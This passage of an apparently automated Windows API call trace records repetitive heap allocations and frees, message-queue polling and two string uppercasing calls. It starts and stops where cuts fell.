(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0166.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0166.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0166.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0166.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0166.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0166.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0166.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0166.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0166.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0166.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0166.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0166.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0166.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0166.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0166.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0166.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0166.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0166.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0166.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0166.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0166.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0166.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0166.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0166.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0166.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0166.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0166.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0166.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0166.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0166.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0166.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0166.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0166.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.211] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.211] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0166.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0166.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0166.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0166.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0166.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0166.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0166.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0166.213] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0166.213] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0166.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.214] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0166.214] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0166.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.214] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0166.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.215] RtlAllocateHeap 